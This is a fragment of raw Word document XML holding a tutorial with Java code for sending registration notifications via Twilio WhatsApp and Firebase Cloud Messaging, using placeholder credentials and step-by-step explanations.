          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FCE70"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F4FD7"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WhatsAppNotificati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676CAF0"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46543F3D"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Your Twilio credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290AF049"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ACCOUNT_SI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your_account_sid"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0F44B"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AUTH_TOKE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your_auth_token"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56989791"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB89F7"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sendWhatsAppMessage</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t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mess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AE89EF8"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wili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i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CCOUNT_SI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UTH_TOKEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792792EA"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C20E7"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essage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> messageSen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ess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reator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C72E89"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honeNumber</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whatsapp:"</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t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WhatsApp recipient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5117E8"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honeNumber</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whatsapp:+14155238886"</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wilio WhatsApp number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F0CD4"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                mess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he message to send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BEA12"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reate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF9234"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36988A51"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Message Sen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essageSe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Sid</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF0C76"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78DC5D7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB7AB6"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8CF5509"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imulate sending a WhatsApp message after registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE0798"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sendWhatsAppMessag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91987654321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elcome to our platform! Your registration is successful."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30763D71"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B252E49" w14:textId="5E1058BC"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6491FA4D" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C5A00" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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wilio.init</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initializes Twilio with your ACCOUNT_SID and AUTH_TOKEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59559FC5" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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essage.creator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates and sends the message to the recipient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF2660" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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Mobile Notification (Using Firebase Cloud Messaging - FCM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD01A99" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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o send push notifications to a mobile device, we use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Firebase Cloud Messaging</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FCM). This allows your backend to send notifications to the mobile app on Android/iOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9944BD" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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eps for FCM Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEC260" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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t Up Firebase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3D429" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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reate a Firebase project in the Firebase Console (https://console.firebase.google.com/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F0954" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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able Firebase Cloud Messaging and get the Server Key from the Firebase Console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5AC96" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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grate Firebase SDK into your mobile app (both Android and iOS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421AE4DD" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nd Notification After User Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCABB31" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Firebase’s HTTP API to send the notification from your backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C1687" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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de to Send FCM Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78F6B6" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP POST requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send notifications via FCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D6A67" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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Java Code (Backend - Using FCM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887800D"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e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HttpURLConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11485ACD"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RL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD0296A"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o</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OutputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1912A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAC0EF"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ushNotificati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888985F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A3E9E"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Firebase Server Key (from Firebase Console)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50FF86"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ERVER_KEY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your_firebase_server_key"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067A680"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FCM_URL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https://fcm.googleapis.com/fcm/send"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B48D9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6B08E"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sendPushNotificatio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deviceToke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mess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8401E03"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y</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ECC3E9E"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URL url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UR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CM_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B11F5"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ttpURLConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectio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HttpURLConnec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ur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openConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CC6AF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F09E1"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et request method and headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4AE290"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connec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etRequestMetho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OST"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2A8BF"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connec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etRequestProperty</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uthoriza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key="</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ERVER_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75707995"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connec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etRequestProperty</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Content-Typ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pplication/json"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F52CEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9A491"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connec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etDoOutp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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB1D20"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55593548"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reate payload to send notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DF148"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payloa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0FE4719"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to\":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deviceToke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5FA7229"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notification\": {\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3FA4DD6"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title\": \"Registration Successful\",\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488D465"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body\":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essag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04915BC"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ED3AEA1"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priority\": \"high\"\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9DF2E75"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7205FB6B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B2B8F"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end the notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812F82B"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y</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OutputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> o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onnec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OutputStrea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AC7870E"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yt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npu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ayloa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Bytes</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utf-8"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394DA43"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o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writ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np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ngth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085FC55"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F2E0100"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E938B7"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Get response code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831848C"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responseCod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onnec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ResponseCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6ADF3"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Response Code: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esponseCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C1ADF"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atch</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Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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9DF9D74"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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A826B6"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7E1D71A"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E05E91F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD1AA9"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E849B69"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imulate sending a push notification after registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AF911"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deviceToke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device_toke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The FCM device token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741C68E"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sendPushNotifica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eviceToke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elcome to the app! Your registration is successful."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B3D6F" w14:textId="77777777"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D7EFB31" w14:textId="753D51AA" w:rsidR="00EC5359" w:rsidRPr="00CE4B95"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3EA7671F" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BE60E" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ttpURLConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to make an HTTP POST request to Firebase Cloud Messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25801A" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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uthorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pass the FCM Server Key in the header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB03730" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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yload</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a JSON payload with the device token and message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32423329" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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vice Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This should be the unique identifier for the user’s device (you get this from the client-side app after Firebase is initialized).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B17626" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00521BB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E36435C">
          <v:rect id="_x0000_i1898" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E69DF" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BB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plete Flow After User Registration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B005039" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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r Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56128E18" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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user registers by providing their details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2246F" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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backend system validates the registration and saves the user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C7784" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hatsApp Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1B77A" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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fter successful registration, the backend sends a WhatsApp message using the Twilio API to notify the user of the successful registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08A9D3" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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obile Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
